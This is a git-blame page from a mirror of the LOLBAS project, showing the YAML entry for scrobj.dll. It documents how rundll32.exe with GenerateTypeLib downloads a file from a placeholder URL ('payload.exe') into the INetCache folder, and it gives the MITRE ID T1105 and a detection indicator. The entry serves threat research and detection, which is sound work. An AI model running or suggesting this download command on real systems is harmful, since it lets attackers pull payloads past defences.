public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-30 16:54:00 +01:00
Code Issues Projects Releases Wiki Activity
3c826ab1ca
LOLBAS/yml/OSLibraries/Scrobj.yml

26 lines
920 B
YAML
Raw Normal View History

Adding scrobj.dll, shimgvw.dll INetCache downloader entries (#189) Co-authored-by: Wietze <wietze@users.noreply.github.com>
2023-08-05 17:50:52 +02:00
---
Name: Scrobj.dll
Description: Windows Script Component Runtime
Author: Eral4m
Created: 2021-01-07
Commands:
- Command: rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe
Description: Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe.
Usecase: Download file from remote location.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Adding tags (closes #9, #318) (#362) * Adding various tags as a first iteration * Adding quotes * Adding 'Custom Format' properly * Updating to key:value pairs * Update template
2024-04-03 17:53:36 +02:00
Tags:
- Download: INetCache
Adding scrobj.dll, shimgvw.dll INetCache downloader entries (#189) Co-authored-by: Wietze <wietze@users.noreply.github.com>
2023-08-05 17:50:52 +02:00
Full_Path:
- Path: c:\windows\system32\scrobj.dll
- Path: c:\windows\syswow64\scrobj.dll
Detection:
- IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line
Resources:
- Link: https://twitter.com/eral4m/status/1479106975967240209
Acknowledgement:
- Person: Eral4m
Handle: '@eral4m'
Reference in New Issue Copy Permalink